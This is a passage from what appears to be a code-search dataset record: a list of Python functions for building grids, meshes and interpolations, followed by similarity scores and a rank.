npts_per_axis)\n rho = list(map(to_rho, asarray(magnitudes)))\n\n return Grid(\n dims=('rho', 'v', 'w', 'kappa', 'sigma', 'h'),\n coords=(rho, v, w, kappa, sigma, h),\n callback=to_mt)", "def CreateTargetGeoField(nbtimestep,latlen,lonlen):\n\n pres_grid = np.zeros((nbtimestep, latlen, lonlen))\n u_grid = np.zeros((nbtimestep, latlen, lonlen))\n v_grid = np.zeros((nbtimestep, latlen, lonlen))\n\n return pres_grid,u_grid,v_grid", "def getQuadrilaterals(self):\n ugroup = np.unique(self._group_index)\n ngroup = len(ugroup)\n qlist = []\n for i in range(ngroup):\n ind = np.where(self._group_index == ugroup[i])[0]\n nq = len(ind) - 1\n for j in range(nq):\n P0 = Point(self._toplons[j],\n self._toplats[j],\n self._topdeps[j])\n P1 = Point(self._toplons[j + 1],\n self._toplats[j + 1],\n self._topdeps[j + 1])\n P2 = Point(self._botlons[j + 1],\n self._botlats[j + 1],\n self._botdeps[j + 1])\n P3 = Point(self._botlons[j],\n self._botlats[j],\n self._botdeps[j])\n qlist.append([P0, P1, P2, P3])\n\n return qlist", "def get_par_meshgrid(self, copy=False, sparse=False): \n axes = []\n for i in range(self.get_n_dimensions()):\n axes.append(self.dims[i].values_strs)\n return np.meshgrid(*axes, copy, sparse, indexing='ij')", "def plot_2D_edp(self, xmin=-100, xmax=100, zmin=-100, zmax=100, N=201):\n rho_xz = []\n xgrid = np.linspace(xmin, xmax, num=N)\n zgrid = np.linspace(zmin, zmax, num=N)\n for x in xgrid:\n for z in zgrid:\n tmp = self.phase * self.F * np.cos(self.qx*x+self.qz*z)\n rho_xz.append([x, z, tmp.sum(axis=0)])\n rho_xz = np.array(rho_xz, float) \n X, Y, Z= rho_xz[:,0], rho_xz[:,1], rho_xz[:,2]\n #Y = rho_xz[:,1]\n #Z = rho_xz[:,2]\n X.shape = (N, N)\n Y.shape = (N, N)\n Z.shape = (N, N)\n plt.figure()\n plt.contourf(X, Y, Z)", "def mesh_generation(coordinates):\n # Get the minimum and maximum for the latitudes\n min_latitude = np.min(coordinates[:, 0])\n max_latitude = np.max(coordinates[:, 0])\n # Get the minimum and maximum for the longitudes\n min_longitude = np.min(coordinates[:, 1])\n max_longitude = np.max(coordinates[:, 1])\n # Get the number of provided coordinates\n size = int(np.min([1e5, np.max([5e4, len(coordinates)])]))\n # Create an array of uniform-random points as a mesh\n mesh_1 = np.random.uniform(min_latitude, max_latitude, size)\n mesh_2 = np.random.uniform(min_longitude, max_longitude, size)\n mesh = np.vstack((mesh_1.flatten(), mesh_2.flatten())).T\n # Return the evenly-spaced mesh for the coordinates\n return mesh", "def make_grid(data=None, xmin=-5, xmax=5, ymin=-5, ymax=5, n_points = 400):\n if data is not None:\n xmin, ymin = 
np.min(data, axis = 0)\n xmax, ymax = np.max(data, axis = 0)\n\n plt.ylim(ymin, ymax)\n plt.xlim(xmin, xmax)\n\n x, y = np.meshgrid(np.linspace(xmin, xmax, n_points), np.linspace(ymin, ymax, n_points))\n grid = np.c_[x.ravel(), y.ravel()] # grid has n_points ^2 row and 2 columns\n return x, y, grid", "def construct_simplex_meshgrid(ng, dimSimplex):\n t_list = np.linspace(0, 1, ng)\n tmp = np.array(np.meshgrid(*[t_list for i in range(dimSimplex - 1)]))\n m = np.zeros([tmp[0].ravel().shape[0], dimSimplex])\n for i in range(dimSimplex - 1):\n m[:, i] = tmp[i].ravel()\n m[:, dimSimplex - 1] = 1 - np.sum(m, axis=1)\n return (m[m[:, -1] >= 0, :])", "def grid(x, y, z, resX=100, resY=100):\n x = x.flatten()\n y = y.flatten()\n z = z.flatten()\n xi = linspace(min(x), max(x), resX)\n yi = linspace(min(y), max(y), resY)\n zi = griddata(x, y, z, xi, yi, interp='linear')\n return xi, yi, zi", "def getQuadrilaterals(self):\n pass", "def __init__(self, dx = 1., dy = 1., nx = 1, ny = 1,\n _RepresentationClass=_Grid2DRepresentation, _TopologyClass=_Mesh2DTopology):\n\n self.args = {\n 'dx': dx,\n 'dy': dy,\n 'nx': nx,\n 'ny': ny\n }\n\n self.nx = nx\n self.ny = ny\n\n self.numberOfHorizontalFaces = self.nx * (self.ny + 1)\n self.numberOfVerticalFaces = self.ny * (self.nx + 1)\n self.numberOfEachDiagonalFaces = self.nx * self.ny\n\n self.dx = PhysicalField(value = dx)\n scale = PhysicalField(value = 1, unit = self.dx.unit)\n self.dx /= scale\n\n self.dy = PhysicalField(value = dy)\n if self.dy.unit.isDimensionless():\n self.dy = dy\n else:\n self.dy /= scale\n\n self.numberOfCornerVertices = (self.nx + 1) * (self. ny + 1)\n self.numberOfCenterVertices = self.nx * self.ny\n self.numberOfTotalVertices = self.numberOfCornerVertices + self.numberOfCenterVertices\n\n self.offset = (0, 0)\n\n vertices = self._createVertices()\n faces = self._createFaces()\n\n cells = self._createCells()\n cells = numerix.sort(cells, axis=0)\n\n Mesh2D.__init__(self, vertices, faces, cells,\n _RepresentationClass=_RepresentationClass, _TopologyClass=_TopologyClass)\n\n self.scale = scale", "def two_plane_obj_points(grid_size, dx):\r\n objp_xy = np.zeros((grid_size[0]*grid_size[1], 3), np.float32)\r\n objp_yz = np.zeros((grid_size[1]*grid_size[2], 3), np.float32)\r\n objp_xy[:,:2] = np.mgrid[0:grid_size[0], 0:grid_size[1]].T.reshape(-1, 2)\r\n objp_yz[:,1:3] = np.mgrid[0:grid_size[1], 0:grid_size[2]].T.reshape(-1, 2)\r\n\r\n return objp_xy*dx, objp_yz*dx", "def _construct_r_grid(n, dr=None, r=None):\n if dr is None and r is None:\n # default value, we don't care about the scaling since the mesh size was not provided\n dr = 1.0\n\n if dr is not None and r is not None:\n raise ValueError('Both r and dr input parameters cannot be specified at the same time')\n elif dr is None and r is not None:\n if r.ndim != 1 or r.shape[0] != n:\n raise ValueError('The input parameter r should be a 1D array'\n 'of shape = ({},), got shape = {}'.format(n, r.shape))\n # not so sure about this, needs verification\n dr = np.gradient(r) \n\n else:\n if isinstance(dr, np.ndarray):\n raise NotImplementedError\n r = (np.arange(n) + 0.5)*dr\n return r, dr", "def make_coordinate_grid(spatial_size, type):\n h, w = spatial_size\n x = torch.arange(w).type(type)\n y = torch.arange(h).type(type)\n x = 2 * (x / (w - 1)) - 1\n y = 2 * (y / (h - 1)) - 1\n yy = y.view(-1, 1).repeat(1, w)\n xx = x.view(1, -1).repeat(h, 1)\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\n return meshed", "def interp_2D(data_grid, info=ProcessInfo()):\n print('Interpolating 
data...')\n meth = info.INTERP_METHOD # Get method for interpolating\n print(meth)\n\n xy_grid = np.nonzero(data_grid)\n z_grid = data_grid[xy_grid]\n grid_x, grid_y = np.mgrid[0:1000:1000j, 0:1000:1000j]\n interp_grid = interpolate.griddata(xy_grid, z_grid, (grid_x, grid_y), method=meth)\n\n return interp_grid", "def uniform_mesh(n, x_0=0.0, x_1=1.0):\n\n assert n>0\n\n\n points = x_0 + (x_1 - x_0)*numpy.arange(n+1,dtype=numpy.float)/n\n boundary = {(0, 0): 'left', (n-1, 1): 'right'}\n\n return points, boundary", "def _nd_plot_grid(self, **kwargs):\n\n from matplotlib.lines import Line2D\n from pesummary.core.plots.publication import pcolormesh\n\n # only add to corner plot if plotting on an existing figure\n if \"fig\" not in kwargs:\n raise TypeError(\n \"Can only add Grid results to an existing corner plot showing samples\"\n )\n\n colors = kwargs.pop(\"colors\")\n\n fig = kwargs.pop(\"fig\")\n ax = fig.axes\n\n quantiles = kwargs.pop(\"quantiles\", None)\n grid2d = kwargs.pop(\"grid2d\", False)\n\n for i, (label, grid) in enumerate(self._grids.items()):\n plotkwargs = {}\n plotkwargs[\"color\"] = colors[i]\n plotkwargs[\"label\"] = label\n\n axidx = 0\n for j, param in enumerate(self.parameters):\n x = grid[0].sample_points[param]\n pdf = np.exp(\n grid[0].marginalize_ln_posterior(not_parameters=param) - grid[1]\n )\n\n ax[axidx].plot(x, pdf, **plotkwargs)\n\n if quantiles is not None:\n low, high = self._credible_interval_grid(\n grid[0], param, interval=quantiles\n )\n ax[axidx].axvline(low, color=colors[i], ls=\"--\")\n ax[axidx].axvline(high, color=colors[i], ls=\"--\")\n\n # plot 2D posteriors\n if grid2d:\n meshkwargs = {}\n meshkwargs[\"zorder\"] = kwargs.get(\"zorder\", -10)\n meshkwargs[\"shading\"] = kwargs.get(\"shading\", \"gouraud\")\n\n if \"cmap\" not in kwargs:\n if colors[i] in COLOR_MAP:\n meshkwargs[\"cmap\"] = COLOR_MAP[colors[i]]\n else:\n meshkwargs[\"cmap\"] = kwargs[\"cmap\"]\n\n for k in range(j + 1, self._num_parameters):\n y = grid[0].sample_points[self.parameters[k]]\n density = np.exp(\n grid[0].marginalize_ln_posterior(\n not_parameters=[param, self.parameters[k]]\n )\n - grid[1]\n )\n\n # set orientation of the 2D grid\n p1idx = grid[0].parameter_names.index(param)\n p2idx = grid[0].parameter_names.index(self.parameters[k])\n if p1idx < p2idx:\n # transpose density\n density = density.T\n\n axyidx = axidx + (k - j) * self._num_parameters\n pcolormesh(x, y, density, ax=ax[axyidx], **meshkwargs)\n\n axidx += self._num_parameters + 1\n\n # update the legend\n handles = []\n for legtext, leghandle in zip(\n fig.legends[0].texts, fig.legends[0].legendHandles\n ):\n label = legtext.get_text()\n legcolor = leghandle.get_color()\n\n handles.append(Line2D([], [], color=legcolor, label=label))\n\n for i, label in enumerate(self._grids):\n for line in ax[0].get_lines():\n linecolor = line.get_color()\n # test that colours are the same\n if linecolor == colors[i]:\n handles.append(Line2D([], [], color=linecolor, label=label))\n break\n\n # remove original legend\n fig.legends = []\n\n # re-add legend\n fig.legend(handles=handles, frameon=False, loc=\"upper right\")\n\n return fig", "def create_grid(self):\n # Domain definition\n network = pp.FractureNetwork2d(self.frac_pts.T, self.frac_edges.T, domain=self.box)\n gb = network.mesh(self.mesh_args) \n pp.contact_conditions.set_projections(gb)\n\n self.gb = gb\n self.Nd = self.gb.dim_max()\n self._Nd = self.gb.dim_max()\n g2d = self.gb.grids_of_dimension(2)[0]\n self.min_face = np.copy(self.mesh_size) 
#np.min(g2d.face_areas)\n self.min_cell = np.min(g2d.cell_volumes)\n self.p, self.t = analysis.adjustmesh(g2d, self.tips, self.GAP)\n self.displacement = self.p*0\n self.fa_no = g2d.face_nodes.indices.reshape((2, g2d.num_faces), order='f').T \n return gb", "def test_init_multigrid():\n\n img_dim = (500, 750)\n h = 64\n\n # expected grid\n xv, yv = (np.arange(0, img_dim[1], h),\n np.arange(0, img_dim[0], h))\n x_exp, y_exp = np.meshgrid(xv, yv)\n\n # actual\n amg = mg.MultiGrid(img_dim, h, WS=127)\n x_act, y_act = amg.x, amg.y\n\n assert np.allclose(x_act, x_exp.ravel())\n assert np.allclose(y_act, y_exp.ravel())", "def cloudy_grid_surface(**kwargs):\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n cloudy_library = clo.library()\n model_number_matrix,grid_table = cloudy_library._restore_grid_table(grid_ext=p.grid_ext)\n\n fig = plt.figure(figsize=(10,7))\n ax = plt.axes(projection='3d')\n\n key1, key2 = list(p.cloudy_param.keys())[0],list(p.cloudy_param.keys())[1]\n value1, value2 = list(p.cloudy_param.values())[0],list(p.cloudy_param.values())[1]\n\n # Decide on what goes on x and y axis\n cloudy_parameters = np.array(['NH','FUV','hden','Z'])\n x_index = cloudy_parameters[(cloudy_parameters != key1) &\\\n (cloudy_parameters != key2)][0]\n y_index = cloudy_parameters[(cloudy_parameters != key1) &\\\n (cloudy_parameters != key2)][1]\n\n # Cut in grid table\n grid_table_cut = grid_table.iloc[np.where((grid_table[key1].values == value1) & \\\n (grid_table[key2].values == value2))[0]]\n x, y = grid_table_cut[x_index].values, grid_table_cut[y_index].values\n X, Y = np.meshgrid(np.unique(grid_table_cut[x_index].values), np.unique(grid_table_cut[y_index].values))\n\n # Plot line ratio?\n if '_' in p.line:\n L1 = grid_table_cut[p.line.split('_')[0]].values\n L2 = grid_table_cut[p.line.split('_')[1]].values\n L2[L2 == 0] = 1e9\n line_lum = (L1/L2).astype(float)\n vmin = np.min(np.log10(line_lum[L2 < 1e9]))\n\n else:\n line_lum = grid_table_cut[p.line].values.astype(float)\n vmin = np.min(np.log10(line_lum[line_lum > 0]))\n\n lum = np.log10(line_lum)\n lum = lum.reshape([len(np.unique(x)), len(np.unique(y))]).T\n\n # ########## Patching the grid !!\n # line_lum[np.isnan(line_lum)] = -1 # what are these?\n # # 0 values: not sure if we have any?\n # line_lum[line_lum == 0] = np.min(line_lum[line_lum > 0])\n # # Negative numbers: missing grid point\n # i_missing = np.where(line_lum < 0)[0]\n # while len(i_missing) > 0:\n # lum = np.log10(line_lum)\n # for i in i_missing:\n # # print(lum[i-1],lum[i+1])\n # try: \n # lum[i] = (lum[i-1] + lum[i+1])/ 2\n # except:\n # pass\n # # print('he',np.isnan(lum[i]))\n # if np.isnan(lum[i]):\n # try:\n # lum[i] = lum[i-1] \n # except:\n # pass\n # if np.isnan(lum[i]):\n # try:\n # lum[i] = lum[i+1] \n # except:\n # pass \n # line_lum[i] = 10.**lum[i]\n # # print(i,lum[i])\n # i_missing = np.where(line_lum < 0)[0]\n # ########## End of patching\n\n\n # pdb.set_trace()\n ax.plot_surface(X, Y, lum, cmap=\"autumn_r\", vmin=vmin, lw=0, rstride=1, cstride=1,alpha=0.8)\n\n ax.set_xlabel('\\n\\n' + getlabel('l'+x_index))\n ax.set_ylabel('\\n\\n' + getlabel('l'+y_index))\n\n try:\n ax.set_zlabel('\\n\\n' + getlabel('l%s' % p.line))\n except:\n ax.set_zlabel('\\n\\n log ' + p.line.replace('_','/'))\n\n\n ax.scatter(x[line_lum > 10.**vmin],y[line_lum > 10.**vmin],np.log10(line_lum[line_lum > 10.**vmin]),\\\n 'o',c=np.log10(line_lum[line_lum > 10.**vmin]),cmap='autumn_r',s=50)\n\n # print(x)\n # print(line_lum)\n ax.view_init(30, p.angle)\n\n 
if p.savefig:\n if not os.path.isdir(p.d_plot + 'look-up/'): os.mkdir(p.d_plot + 'look-up/') \n plt.savefig(p.d_plot + 'look-up/cloudy_grid_%s.%s' % (p.line, p.format), format=p.format, dpi=300) \n # pdb.set_trace()", "def g2Dto1Dgrid(g2D, grid, average_grid=False):\n\n g2D = np.array(g2D)\n grid = np.array(grid)\n\n g1D_dic = DictList() # hash table of radii and values at radii\n\n for i in range(g2D.shape[0]):\n for j in range(g2D.shape[1]):\n g1D_dic[grid[i, j]] += [g2D[i, j]]\n\n g1D = np.array(list(map(\n lambda radius: [radius, np.mean(g1D_dic[radius])],\n sorted(g1D_dic))))\n\n if not(average_grid): return g1D\n\n g2D_cylindrical = np.zeros(grid.shape)\n for radius, mean_g in zip(*np.transpose(g1D)):\n for i, j in zip(*np.where(grid == radius)):\n g2D_cylindrical[i, j] = mean_g\n\n return g1D, g2D_cylindrical", "def _build_quadrant_indices(self, xval: Union[np.ndarray, da.Array], yval: Union[np.ndarray, da.Array]):\n\n xmin, ymin = self.mins\n xmax, ymax = self.maxs\n xmid = (0.5 * (xmin + xmax)).astype(xmin.dtype)\n ymid = (0.5 * (ymin + ymax)).astype(ymin.dtype)\n\n # split the data into four quadrants\n xval_lessthan = xval <= xmid\n xval_greaterthan = xval >= xmid\n yval_lessthan = yval <= ymid\n yval_greaterthan = yval >= ymid\n\n idx = np.array(self.index)\n index_q0 = idx[xval_lessthan & yval_greaterthan].tolist() # top left\n index_q1 = idx[xval_greaterthan & yval_greaterthan].tolist() # top left\n index_q2 = idx[xval_lessthan & yval_lessthan].tolist() # top left\n index_q3 = idx[xval_greaterthan & yval_lessthan].tolist() # top left\n\n return index_q0, index_q1, index_q2, index_q3, xmin, xmax, ymin, ymax, xmid, ymid", "def create_grid(grid):\r\n for i in range (4):\r\n grid.append ([])\r\n for j in range (4):\r\n grid[i].append (0)", "def make_grid(lat_values, lon_values, np_lat, np_lon):\n \n coordsys = iris.coord_systems.RotatedGeogCS(np_lat, np_lon)\n \n latitude = iris.coords.DimCoord(lat_values,\n standard_name='latitude',\n units='degrees_north',\n coord_system=coordsys)\n longitude = iris.coords.DimCoord(lon_values, \n standard_name='longitude',\n units='degrees_east',\n coord_system=coordsys)\n\n dummy_data = numpy.zeros((len(lat_values), len(lon_values)))\n new_cube = iris.cube.Cube(dummy_data, dim_coords_and_dims=[(latitude, 0), (longitude, 1)])\n \n return new_cube", "def create_square_triangle_mesh():\n vertices = np.array(\n ((0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0.5, 0.5, 0)),\n dtype=np.float32)\n faces = np.array(\n ((0, 1, 4), (1, 3, 4), (3, 2, 4), (2, 0, 4)), dtype=np.int32)\n return vertices, faces", "def create_square_grid(self, len_side_a, len_side_b):\n if (len_side_a < 2) or (len_side_b < 2):\n raise ValueError('side length attributes for HexagonalCells should be at least 2.')\n\n self.connections, self.weights = create_grid_square_cells(len_side_a, len_side_b)\n self.shape = (len_side_a, len_side_b)\n\n # populate the dictionary from cell coordinates to cell indexes in arrays connection and weights\n for i in range(len_side_a):\n for j in range(len_side_b):\n self.dict_cell_id_to_ind[(i, j)] = j + i*len_side_b", "def get_grid_mesh_coordinates(bbox, spacings=(1,1,1), dot_spacing=1, include_borderline=True):\n\n xmin,xmax,ymin,ymax,zmin,zmax = bbox\n\n xdim, ydim, zdim = (xmax+1-xmin, ymax+1-ymin, zmax+1-zmin)\n\n xs = np.arange(0, xdim, spacings[0])\n ys = np.arange(0, ydim, spacings[1])\n zs = np.arange(0, zdim, spacings[2])\n\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = 
zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n if include_borderline:\n if 0 not in xs:\n xs = np.r_[0, xs, xdim-1]\n else:\n xs = np.r_[xs, xdim-1]\n if 0 not in ys:\n ys = np.r_[0, ys, ydim-1]\n else:\n ys = np.r_[ys, ydim-1]\n if 0 not in zs:\n zs = np.r_[0, zs, zdim-1]\n else:\n zs = np.r_[zs, zdim-1]\n for y in ys:\n vol[y, xs, ::dot_spacing] = 1\n vol[y, ::dot_spacing, zs] = 1\n for x in xs:\n vol[ys, x, ::dot_spacing] = 1\n vol[::dot_spacing, x, zs] = 1\n for z in zs:\n vol[ys, ::dot_spacing, z] = 1\n vol[::dot_spacing, xs, z] = 1\n\n ys, xs, zs = np.nonzero(vol)\n\n return np.c_[xs, ys, zs] + (xmin,ymin,zmin)", "def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)", "def create_grid(grid):\r\n inner = [0]*4\r\n for i in range(4):\r\n grid.append(inner[:])", "def mesh2grid(v, x, z):\n lx = x.max() - x.min()\n lz = z.max() - z.min()\n nn = v.size\n mesh = _stack(x, z)\n\n nx = np.around(np.sqrt(nn*lx/lz))\n nz = np.around(np.sqrt(nn*lz/lx))\n dx = lx/nx\n dz = lz/nz\n\n # construct structured grid\n x = np.linspace(x.min(), x.max(), nx)\n z = np.linspace(z.min(), z.max(), nz)\n X, Z = np.meshgrid(x, z)\n grid = _stack(X.flatten(), Z.flatten())\n\n # interpolate to structured grid\n V = scipy.interpolate.griddata(mesh, v, grid, 'linear')\n\n # workaround edge issues\n if np.any(np.isnan(V)):\n W = scipy.interpolate.griddata(mesh, v, grid, 'nearest')\n for i in np.where(np.isnan(V)):\n V[i] = W[i]\n\n return np.reshape(V, (nz, nx))", "def create_grid_and_edges(data, drone_altitude, safety_distance):\n # minimum and maximum north coordinates\n north_min = np.floor(np.min(data[:, 0] - data[:, 3]))\n north_max = np.ceil(np.max(data[:, 0] + data[:, 3]))\n\n # minimum and maximum east coordinates\n east_min = np.floor(np.min(data[:, 1] - data[:, 4]))\n east_max = np.ceil(np.max(data[:, 1] + data[:, 4]))\n\n # given the minimum and maximum coordinates we can\n # calculate the size of the grid.\n north_size = int(np.ceil(north_max - north_min))\n east_size = int(np.ceil(east_max - east_min))\n\n # Initialize an empty grid\n grid = np.zeros((north_size, east_size))\n # Initialize an empty list for Voronoi points\n points = []\n # Populate the grid with obstacles\n for i in range(data.shape[0]):\n north, east, alt, d_north, d_east, d_alt = data[i, :]\n if alt + d_alt + safety_distance > drone_altitude:\n obstacle = [\n int(np.clip(north - d_north - safety_distance - north_min, 0, north_size-1)),\n int(np.clip(north + d_north + safety_distance - north_min, 0, north_size-1)),\n int(np.clip(east - d_east - safety_distance - east_min, 0, east_size-1)),\n int(np.clip(east + d_east + safety_distance - east_min, 0, east_size-1)),\n ]\n grid[obstacle[0]:obstacle[1]+1, obstacle[2]:obstacle[3]+1] = 1\n # add center of obstacles to points list\n points.append([north - north_min, east - east_min])\n\n graph = Voronoi(points)\n\n edges = []\n for v in 
graph.ridge_vertices:\n p1 = graph.vertices[v[0]]\n p2 = graph.vertices[v[1]]\n cells = list(bresenham(int(p1[0]), int(p1[1]), int(p2[0]), int(p2[1])))\n hit = False\n\n for c in cells:\n if np.amin(c) < 0 or c[0] >= grid.shape[0] or c[1] >= grid.shape[1]:\n hit = True\n break\n if grid[c[0], c[1]] == 1:\n hit = True\n break\n\n if not hit:\n p1 = (p1[0], p1[1])\n p2 = (p2[0], p2[1])\n edges.append((p1, p2))\n\n return grid, edges, int(north_min), int(east_min)", "def create_uniform_grid(low, high, bins=(10, 10)):\n grid = [np.linspace(low[dim], high[dim], bins[dim] + 1)[1:-1]\n for dim in range(len(bins))]\n\n return grid", "def cell_edges3d_cartesian(self, axis2, axis3):" ]
[ "0.72705615", "0.6971521", "0.6954679", "0.694505", "0.694505", "0.6930976", "0.6930976", "0.6930976", "0.6930976", "0.6908422", "0.6903842", "0.69015664", "0.6880629", "0.6800234", "0.6800234", "0.6661612", "0.6625001", "0.66245806", "0.63171464", "0.62140924", "0.6175486", "0.6159924", "0.61487824", "0.61355203", "0.60373604", "0.6009462", "0.60068315", "0.59965444", "0.5980873", "0.59378344", "0.5906833", "0.5882443", "0.5866265", "0.5855601", "0.5835231", "0.58020157", "0.5783776", "0.5743535", "0.5742318", "0.57405406", "0.57229644", "0.56922287", "0.567624", "0.5627061", "0.5599888", "0.559854", "0.5594069", "0.5590157", "0.5577149", "0.5573161", "0.5566499", "0.556102", "0.55513567", "0.55420184", "0.5538299", "0.5516979", "0.5504284", "0.55003315", "0.5471656", "0.546918", "0.5468522", "0.5466755", "0.5466003", "0.5461426", "0.5443951", "0.5437529", "0.54198724", "0.54185784", "0.5415632", "0.5411417", "0.54050976", "0.53861713", "0.5384879", "0.5365452", "0.53611004", "0.53562725", "0.535349", "0.53505725", "0.53472", "0.5345733", "0.5341903", "0.5338834", "0.5337922", "0.53370667", "0.53318197", "0.5329653", "0.5322349", "0.5301423", "0.53008676", "0.52967274", "0.5292623", "0.52850217", "0.5280276", "0.5275985", "0.52757245", "0.5275482", "0.5274125", "0.52725124", "0.5265923", "0.52649" ]
0.56618655
43
Get vertices dividing a 1d grid.
def get_1d_vertices(grid, cut_edges=False):
    if len(grid.shape) > 1:
        raise ValueError("grid must be 1d array.")
    diff = np.diff(grid)
    vert = np.zeros(grid.size+1)
    # Interior vertices: halfway between points
    vert[1:-1] = grid[0:-1] + diff/2
    # Edge vertices: tight or reflect
    if cut_edges:
        vert[0] = grid[0]
        vert[-1] = grid[-1]
    else:
        vert[0] = grid[0] - diff[0]/2
        vert[-1] = grid[-1] + diff[-1]/2
    return vert
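A minimal usage sketch (an illustrative addition, not part of the original record), assuming NumPy is imported as np and the function above is in scope: interior vertices fall halfway between grid points, and the edge vertices are either clamped to the grid ends or extrapolated by half a spacing.

import numpy as np

grid = np.array([0.0, 1.0, 3.0])
print(get_1d_vertices(grid))                  # [-0.5  0.5  2.   4. ]
print(get_1d_vertices(grid, cut_edges=True))  # [0.   0.5  2.   3. ]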
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vertices(self):\n try:\n return self._vertices\n except:\n self._vertices = [list(x) for x in self.vertex_generator()]\n return self._vertices", "def vertices(self):\n\n if self._faces is None:\n if self._vertices is None:\n return None\n self.triangulate()\n return self._vertices", "def vertices(self) -> list[Point]:\n first_polygon_index = self.rank - max(self.pdim - 1, 1) - 1\n new_shape = self.shape[:first_polygon_index] + (-1, self.shape[-1])\n array = self.array.reshape(new_shape)\n return list(distinct(Point(x, copy=False) for x in np.moveaxis(array, -2, 0)))", "def vertices(self):\n return self._vertices", "def get_vertices(self):\n return self.vertices", "def get_vertices(self):\n return self.vertices", "def vertices(self):\n return self.pointlist", "def get_vertices(self):\n return self._vertices", "def vertices(self):\n return list(self._graph)", "def _vertices(self, point):\n vertex_0, vertex_1, vertex_2 = tuple(\n gs.take(point, indices=self.faces[:, i], axis=-2) for i in range(3)\n )\n if point.ndim == 3 and vertex_0.ndim == 2:\n vertex_0 = gs.expand_dims(vertex_0, axis=0)\n vertex_1 = gs.expand_dims(vertex_1, axis=0)\n vertex_2 = gs.expand_dims(vertex_2, axis=0)\n return vertex_0, vertex_1, vertex_2", "def vertexes(self):\n theta = self.orientation\n shifts = np.array([np.cos(theta), np.sin(theta)]) * self.a\n return self.coords + (shifts[:, None] * [-1, 1]).T", "def get_vertices(self, crs=None):\n if (crs is None) or (crs is self.crs):\n return np.array(self.vertices)\n else:\n vertices = [_reproject(v[:2], self.crs, crs)\n for v in self.vertices]\n return np.array(vertices)", "def vertices(self):\n d = self.space_dimension()\n v = vector(ZZ, d)\n points = []\n for g in self.minimized_generators():\n for i in range(0,d):\n v[i] = g.coefficient(Variable(i))\n v_copy = copy.copy(v)\n v_copy.set_immutable()\n points.append(v_copy)\n return tuple(points)", "def get_vertices(self):\n\n return self._vertices", "def get_vertices(self, crs=None):\n if crs is None:\n vertices = []\n for poly_vertices in self.vertices:\n vertices.append([np.array(v) for v in poly_vertices])\n return vertices\n else:\n vertices = []\n for poly_vertices in self.vertices:\n poly = []\n for ring_vertices in poly_vertices:\n poly.append(np.array([_reproject(v[:2], self.crs, crs)\n for v in ring_vertices]))\n vertices.append(poly)\n return vertices", "def get_vertices(self):\n vertices = []\n V = [[-self.base_vectors[:,n], self.base_vectors[:,n]] for n in range(self.base_vectors.shape[1])]\n combs = list(itertools.product(*V))\n for cb in combs:\n cb = np.sum(np.array(cb).T, axis=1, keepdims=True)\n vertices.append(self.base_vertices + cb)\n\n vertices = np.concatenate(vertices,axis=1)\n return vertices", "def get_vertices(self, crs=None):\n if crs is None:\n return [np.array(v) for v in self.vertices]\n else:\n vertices = []\n for line in self.vertices:\n line_vertices = [_reproject(v[:2], self.crs, crs) for v in line]\n vertices.append(np.array(line_vertices))\n return vertices", "def get_vertices(self):\n return self.vertList.keys()", "def vertices(self):\n return self.keys()", "def vertices(self):\n return list(self.__graph.values())", "def vertices(self):\n return map(Vertex, self._top_exp.vertices())", "def mesh(self):\n return numpy.meshgrid(*self.edges, indexing='ij')", "def get_vertices(self):\n return list(self.vertices.keys())", "def meshgrid(self):\n vecs = self.coord_vecs\n return np.meshgrid(*vecs, indexing='ij')", "def grid_coords(self):\n return [(x, y) for y in range(self.height) 
for x in range(self.width)]", "def get_vertices(self):\n return self.graph.keys()", "def get_all_vertices(self):\r\n for vertex in self.__neighbours.keys():\r\n yield vertex", "def vertices(self) -> list[Point]:\n a = Point(self.array[..., 0, :], copy=False)\n b = Point(self.array[..., 1, :], copy=False)\n return [a, b]", "def _build_grid(self):\n n = self.params['n']\n\n x_min, x_max = min(self.node[:, 0]), max(self.node[:, 0])\n y_min, y_max = min(self.node[:, 1]), max(self.node[:, 1])\n xv = np.linspace(x_min, x_max, num=n, endpoint=True)\n yv = np.linspace(y_min, y_max, num=n, endpoint=True)\n xg, yg = np.meshgrid(xv, yv, sparse=False, indexing='xy')\n\n return xg, yg", "def make_complete_graph(num_vertices):\n V = num_vertices\n K = V * (V - 1) // 2\n grid = np.zeros([3, K], np.int32)\n k = 0\n for v2 in range(V):\n for v1 in range(v2):\n grid[:, k] = [k, v1, v2]\n k += 1\n return grid", "def obtener_vertices(self):\n return list(self.vertices.keys())", "def getVertices(self):\n return self.vertexIndex", "def vertices(tri, vertex_list):\n dim = len(vertex_list[0])\n p = numpy.zeros((3, dim))\n for j in range(3):\n p[j] = vertex_list[tri[j]]\n return p", "def edges_as_vertices(self) -> Iterable[Tuple[Vec3, Vec3]]:\n v = self.vertices\n for edge in self.edges:\n yield v[edge[0]], v[edge[1]]", "def vertices(self):\r\n return self.adjacent.keys()", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n part = Partition(list(self))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def p2vertices(self, p):\n h = self.top\n verts = np.empty((self.nparams + 2, 2))\n verts[:, 0] = self._modelx\n verts[:, 1] = np.concatenate([[h], p, [h]])\n return verts", "def makeStartingGrid(self):\n return util.make2DArray(self.xN, self.yN, False)", 